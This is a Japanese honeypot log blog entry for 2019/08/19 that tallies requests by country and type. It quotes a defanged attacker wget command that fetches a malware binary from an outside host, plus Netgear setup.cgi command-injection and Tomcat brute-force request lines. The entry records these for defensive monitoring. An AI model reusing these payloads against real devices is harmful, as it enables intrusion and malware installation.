23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(156日目)

2019/08/19(月)

トータルは4049件でした。

ハンティングログは以下です。

188.216.5[.]54 wget+hxxp[:]//192.236.162[.]197/vb/Amakano.mpsl

www.virustotal.com

IPのロケーション別の件数は以下です。

フィンランド 4002
ブラジル 11
アメリ 5
中国 5
ロシア 4
インドネシア 3
オランダ 2
インド 2
イラン 2
スペイン 2
ポーランド 1
ドイツ 1
トルコ 1
アルバニア 1
コロンビア 1
ドミニカ 1
イタリア 1
グルジア 1
アルゼンチン 1
リビア 1
ミャンマー 1

f:id:sec23:20190820192240p:plain

件数 概要 リクエス
4002 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
36 アクセス GET /
2 Netgearの脆弱性を狙った通信 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1
2 phpMyAdminの調査 GET /admin-scripts.asp
1 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 不正中継の調査 HEAD hxxp[:]//123.125.114[.]144/
1 不正中継の調査 GET hxxp[:]//www[.]ip[.]cn/
1 不正中継の調査 GET hxxp[:]//www[.]123cha[.]com/
1 不明 GET /dd/
1 不正中継の調査 CONNECT www[.]baidu[.]com:443
1 不正中継の調査 CONNECT cn[.]bing[.]com:443

Netgearの脆弱性を狙った通信について
labsblog.f-secure.com